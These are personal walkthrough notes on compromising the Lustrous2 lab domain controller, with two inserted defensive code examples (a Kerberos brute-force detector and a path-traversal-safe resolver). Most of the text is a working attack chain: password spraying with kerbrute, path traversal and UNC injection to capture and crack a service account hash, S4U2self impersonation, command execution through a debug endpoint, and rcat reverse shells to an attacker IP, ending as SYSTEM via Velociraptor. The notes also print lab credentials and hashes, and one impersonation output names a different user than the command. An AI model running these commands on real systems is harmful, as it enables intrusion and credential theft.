Lustrous2
This is not a writeup, just my notes about the machine.

Operating System: Windows Server 2022 Standard
Chain: False
Credentials
Username        Password      Obtained via            Type
--------------  ------------  ----------------------  ----------------------
Emma.Bell       Summer2024!   Brute forcing           Domain User
Terence.Jordan  Lustrous2!    Brute forcing           Domain User
Thomas.Myers    Lustrous2024  Brute forcing           Domain User
SHARESVC        #1Service     LLMNR/NBT-NS poisoning  Domain Service Account
✅ Valid Usernames
Aaron.Norman
Adam.Barnes
Amber.Ward
Andrea.Smith
Ann.Lynch
Callum.Oliver
Carly.Walker
Chelsea.Smith
Chloe.Hammond
Christopher.Lawson
Claire.Parry
Darren.Lewis
Deborah.Jones
Dominic.West
Duncan.Smith
Elaine.Gallagher
Eleanor.Gregory
Emma.Bell
Francesca.Norman
Gary.Richards
Gerard.Ward
Glenn.Williams
Graeme.Pritchard
Harriet.Richardson
Henry.Connor
Howard.Robinson
Jacqueline.Phillips
Janice.Collier
Jasmine.Johnson
Joan.Wall
Judith.Francis
Justin.Williams
Kyle.Hussain
Kyle.Lloyd
Lawrence.Bryan
Leah.Elliott
Lewis.Khan
Liam.Wheeler
Lisa.Begum
Louis.Phillips
Lydia.Parker
Malcolm.Yates
Marie.Hill
Martin.Hamilton
Mathew.Roberts
Melissa.Thompson
Nathan.Carter
Nicola.Clarke
Nicola.Hall
Nigel.Lee
Pamela.Taylor
Robert.Russell
Ryan.Davies
Ryan.Moore
Ryan.Rowe
Samantha.Smith
Sara.Matthews
ShareSvc
Sharon.Birch
Sharon.Evans
Stacey.Barber
Stacey.Griffiths
Stephanie.Baxter
Stephanie.Davies
Steven.Sutton
Susan.Johnson
Terence.Jordan
Thomas.Myers
Tony.Davies
Victoria.Williams
Wayne.Taylor
🔑 Passwords list
Summer2024!
Lustrous2!
Lustrous2024
#1Service
Information Gathering
# Nmap 7.94SVN scan initiated Wed Apr 16 15:21:21 2025 as: nmap -p- --open -T5 -Pn -n -A -oN ext_tcp_lustrous2_allports -vvv 10.10.114.231
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-16 19:33:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
55618/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
55851/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Enumeration
FTP
FTP anonymous login enabled.
❯ wget -m --no-passive ftp://ftp:ftp@10.10.114.231
Valid usernames were found inside the FTP share (see the Valid Usernames section above).
A file in the share leaks the audit findings:
File: ITSEC/audit_draft.txt
----------------------------------
Audit Report Issue Tracking
[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled
[Open] Weak User Passwords
DNS
Not vulnerable to DNS Zone Transfer
HTTP
The website uses some type of authentication.
curl http://lus2dc.lustrous2.vl -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
X-Powered-By: ASP.NET
Date: Wed, 16 Apr 2025 21:28:37 GMT
Initial Foothold
Abusing Weak Credentials
File: possible-passwords.txt
---------------------------------
lustrous
development
homes
hr
it
itsec
production
sec
winter
spring
summer
fall
File: custom.rules
---------------------------------
:
c
$1
$2
$3
$4
$5
$6
$7
$8
$9
$1!
$2!
$3!
$4!
$5!
$6!
$7!
$8!
$9!
$2 $0 $2 $4
$2 $0 $2 $5
$2 $0 $2 $4 $!
$2 $0 $2 $5 $!
c $2 $0 $2 $4
c $2 $0 $2 $5
c $2 $0 $2 $4 $!
c $2 $0 $2 $5 $!
❯ hashcat --force possible-passwords.txt -r custom.rules --stdout | sort -u > mut_passwords.txt
Brute forcing Kerberos
NTLM authentication is disabled (STATUS_NOT_SUPPORTED), so Kerberos authentication was used.
❯ cat users.txt | while read line; do /opt/kerbrute/kerbrute bruteuser -d lustrous2.vl --dc 10.10.114.231 mut_passwords.txt $line -v -t 100 | grep --color=never "VALID LOGIN";done
2025/04/16 17:18:59 > [+] VALID LOGIN: Emma.Bell@lustrous2.vl:Summer2024!
2025/04/16 17:19:58 > [+] VALID LOGIN: Terence.Jordan@lustrous2.vl:Lustrous2!
2025/04/16 17:20:00 > [+] VALID LOGIN: Thomas.Myers@lustrous2.vl:Lustrous2024
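One way a defender would spot the brute force above, as an added example that is not part of the original notes: each wrong password makes the DC log event 4771 (pre-authentication failed, failure code 0x18), and the hit that follows logs 4768. The sample events are constructed and simplified to one line per event; the 10.10.94.200 client is made up.

```python
# Added example (not part of the original notes): detection logic for a
# kerbrute-style "bruteuser" run. Each wrong password yields event 4771
# (Kerberos pre-authentication failed, Failure Code 0x18 = KDC_ERR_PREAUTH_FAILED);
# the correct one yields 4768 (TGT requested, Result Code 0x0). Many 0x18 events
# for one account from one client IP in a short window, followed by a 4768 from
# the same pair, is the pattern to alert on. The DC must have
# "Audit Kerberos Authentication Service" enabled for these events to exist.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: "<time> <event_id> <account> <client_ip> <code>".
# The burst mirrors the 17:18 Emma.Bell hit; Gary.Richards is one typo, then success.
SAMPLE_LOG = [f"2025-04-16T17:18:{s:02d} 4771 Emma.Bell 10.8.5.48 0x18" for s in range(10, 59)]
SAMPLE_LOG += [
    "2025-04-16T17:18:59 4768 Emma.Bell 10.8.5.48 0x0",
    "2025-04-16T17:30:00 4771 Gary.Richards 10.10.94.200 0x18",
    "2025-04-16T17:30:20 4768 Gary.Richards 10.10.94.200 0x0",
]


def parse_event(line):
    ts, event_id, account, client, code = line.split()
    return datetime.fromisoformat(ts), int(event_id), account, client, code.lower()


def find_bruteforce(lines, window=timedelta(minutes=5), threshold=10):
    """One finding per (client, account) pair with >= threshold pre-auth
    failures inside any window; password_found is True when a TGT was issued
    to that pair at or after the last failure."""
    failures, successes = defaultdict(list), defaultdict(list)
    for line in lines:
        ts, event_id, account, client, code = parse_event(line)
        if event_id == 4771 and code == "0x18":
            failures[(client, account)].append(ts)
        elif event_id == 4768 and code == "0x0":
            successes[(client, account)].append(ts)
    findings = []
    for key, times in failures.items():
        times.sort()
        j = 0
        for i in range(len(times)):  # sliding window over sorted failure times
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= threshold:
                findings.append({"client": key[0], "account": key[1], "failures": len(times),
                                 "password_found": any(t >= times[-1] for t in successes[key])})
                break
    return findings
```

The threshold and window are tuning knobs; with `-t 100` threads, kerbrute's failures for one user arrive within seconds, so even a one-minute window catches it.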
Setting up Kerberos on my local computer
File: /etc/hosts
-----------------------
10.10.94.178 LUS2DC.Lustrous2.vl Lustrous2.vl LUS2DC
File: /etc/krb5.conf
--------------------------
[libdefaults]
default_realm = LUSTROUS2.VL
[realms]
LUSTROUS2.VL = {
kdc = 10.10.94.178
admin_server = 10.10.94.178
}
[domain_realm]
.lustrous2.vl = LUSTROUS2.VL
Requesting a Ticket Granting Ticket to authenticate to the web application
The tester previously got 401 Unauthorized because the request was not authenticated with Kerberos.
curl http://lus2dc.lustrous2.vl -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
X-Powered-By: ASP.NET
Date: Wed, 16 Apr 2025 21:28:37 GMT
Using valid credentials to request TGT.
❯ impacket-getTGT lustrous2.vl/Emma.Bell:Summer2024! -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in Emma.Bell.ccache
Attempting to request the website with curl using Kerberos authentication.
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/' -I
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvRYGdwOopf3ALsYtJwX/1QAgdfZprXjjjIyInMZszgBJ7qgmvmkWukupJM3/vBWS8nLJ0NRhRiBwee8mrRojzvaLzAvXF6dTUw6bR+6C4/z+/SXd8QbHETNSq/YYLH/1Xb957F0SwbszCpjGJvEHv
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 17 Apr 2025 03:19:53 GMT
Setting up Firefox to use Kerberos authentication
Navigate to: about:config
network.negotiate-auth.trusted-uris = .lustrous2.vl
network.negotiate-auth.delegation-uris = .lustrous2.vl
network.negotiate-auth.using-native-gsslib = true

Discovering Path Traversal vulnerability
Vulnerable parameter: fileName

Abusing Path Traversal to download web.config file.
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=../../web.config'
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
<system.webServer>
<handlers>
<add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
</handlers>
<aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
</system.webServer>
</location>
</configuration>
<!--ProjectGuid: 4E46018E-B73C-4E7B-8DA2-87855F22435A-->
Capturing ShareSvc's NTLMv2 Hash
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=\\10.8.5.48\Testing'
❯ sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
<SNIF>
[SMB] NTLMv2-SSP Client : 10.10.94.178
[SMB] NTLMv2-SSP Username : LUSTROUS2\ShareSvc
[SMB] NTLMv2-SSP Hash : ShareSvc::LUSTROUS2:7690e22b2b8d57eb:8947641912174F1E60CDBC725C108B0E:0101000000000000004A7FAE00AFDB01CF12C9D34C36ADE900000000020008004E004C004B00380001001E00570049004E002D0037004500510045005400550052004C00490045004E0004003400570049004E002D0037004500510045005400550052004C00490045004E002E004E004C004B0038002E004C004F00430041004C00030014004E004C004B0038002E004C004F00430041004C00050014004E004C004B0038002E004C004F00430041004C0007000800004A7FAE00AFDB0106000400020000000800300030000000000000000000000000210000AF4DFB35102267BCA2807A12D0F747441622D31D20E985EDEC7ECFFC076110500A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000
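Both curl payloads above (the `../../web.config` traversal and the `\\10.8.5.48\Testing` UNC name that made ShareSvc authenticate outbound) come from the same handler flaw: the user-supplied fileName is joined onto the download directory and trusted. The following is an added example, not the LuShare code; it uses Python's ntpath for Windows path semantics, and the download directory C:\inetpub\lushare\files is assumed.

```python
# Added example (not the LuShare application's code): the unsafe join behind
# both curl payloads above, next to a hardened resolver. ntpath supplies
# Windows path semantics, so this runs on any platform.
import ntpath

# Assumed download directory; only C:\inetpub\lushare appears in the notes.
SHARE_DIR = r"C:\inetpub\lushare\files"


class UnsafePath(ValueError):
    """Raised when fileName would leave the download directory."""


def vulnerable_download_path(base_dir, file_name):
    r"""Naive handler: join and trust the result. '../../web.config' walks out
    of base_dir, and a UNC name like \\10.8.5.48\Testing discards base_dir
    entirely, so the worker (running as ShareSvc) opens SMB to that host."""
    return ntpath.join(base_dir, file_name)


def resolve_download_path(base_dir, file_name):
    """Return the absolute path for file_name only if it stays in base_dir."""
    if not file_name or "\x00" in file_name:
        raise UnsafePath("empty name or NUL byte")
    # Drive and UNC prefixes (C:\..., \\host\share) are rejected outright; any
    # other colon would be an NTFS alternate data stream (name::$DATA).
    if ntpath.splitdrive(file_name)[0] or ":" in file_name:
        raise UnsafePath("absolute, UNC or stream path: %r" % file_name)
    if file_name[0] in "\\/":
        raise UnsafePath("rooted path: %r" % file_name)
    base = ntpath.normpath(base_dir)
    candidate = ntpath.normpath(ntpath.join(base, file_name))
    # NTFS is case-insensitive, so compare folded; require base plus a
    # separator as prefix so C:\share2 does not pass for C:\share.
    if not candidate.lower().startswith(base.lower() + "\\"):
        raise UnsafePath("escapes %s: %r -> %s" % (base, file_name, candidate))
    return candidate


def is_allowed(base_dir, file_name):
    """Boolean form of resolve_download_path for policy checks and tests."""
    try:
        resolve_download_path(base_dir, file_name)
        return True
    except UnsafePath:
        return False
```

In the real handler the resolved path should additionally be opened with share-relative APIs or an allow-list of file names, since normalisation alone does not cover symlinks and junctions inside the directory.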
Cracking the NTLMv2 hash and recovering the plaintext credential.
❯ hashcat -m 5600 ShareSVC.ntlmv2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
SHARESVC::LUSTROUS2:7690e22b<SNIF>0000000000:#1Service
Analyzing data with Bloodhound
Script: kozmer
The tester was not able to execute the BloodHound ingestor. Instead, they used ldapsearch together with ldapsearch_parser.py to collect and convert LDAP data into a format compatible with BloodHound.
❯ ldapsearch -LLL -H ldap://lus2dc.lustrous2.vl -Y GSSAPI -b "DC=LUSTROUS2,DC=VL" -N -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' "(&(objectClass=*))" | tee output.txt
❯ python3 ldapsearch_parser.py output.txt ldapsearch_bofhound.txt
❯ pipx install bofhound
❯ bofhound --input ldapsearch_bofhound.txt --output /tmp/bh --zip

The group belongs to the Protected Users group, which enforces strict security restrictions. As a result, it is not possible to use techniques such as crafting Silver Tickets, NTLM authentication, or Kerberos delegation to impersonate the user. These protections are specifically designed to mitigate credential theft and abuse scenarios. However, in some specific cases, the S4U2Self Kerberos extension may allow a service account configured with appropriate delegation permissions to request a service ticket to itself on behalf of the protected user, potentially bypassing some of these restrictions under very controlled conditions.
Authenticating to the application as a Share Admin user

❯ impacket-getTGT lustrous2.vl/SHARESVC:'#1Service' -dc-ip lustrous2.vl
❯ export KRB5CCNAME=SHARESVC.ccache
❯ impacket-getST -self -impersonate "Sharon.Birch" -k -no-pass lustrous2.vl/SHARESVC:'#1Service' -altservice HTTP/lus2dc.lustrous2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Darren.Lewis
[*] Requesting S4U2self
[*] Changing service from SHARESVC@LUSTROUS2.VL to HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
[*] Saving ticket in Darren.Lewis@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
❯ export KRB5CCNAME=Sharon.Birch@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache
Analyzing LuShare.dll
Linux DLL decompiler: CodemerxDecompile
The application exposes a /file/debug endpoint that executes commands if the right PIN is supplied.

Executing a curl command to confirm remote command execution

Sending a reverse shell using the rcat tool
Tool: rcat
❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Debug' -X POST --data-urlencode 'command=.\rcat.exe connect 10.8.5.48 1234' -d 'pin=ba45c518'

Privilege Escalation
Discovering Velociraptor software
PS C:\inetpub\lushare> get-itemproperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | select DisplayName,DisplayVersion,InstallLocation
DisplayName DisplayVersion InstallLocation
----------- -------------- ---------------
<SNIF>
Velociraptor 0.72.6
Creating an API client configuration as Administrator
PS C:\Program Files\VelociraptorServer> .\velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml
Sending a reverse shell using the rcat tool to gain access as NT AUTHORITY\SYSTEM
PS C:\Program Files\VelociraptorServer> .\velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','c:\\Temp\\rcat.exe','connect','10.8.5.48','4444'])"
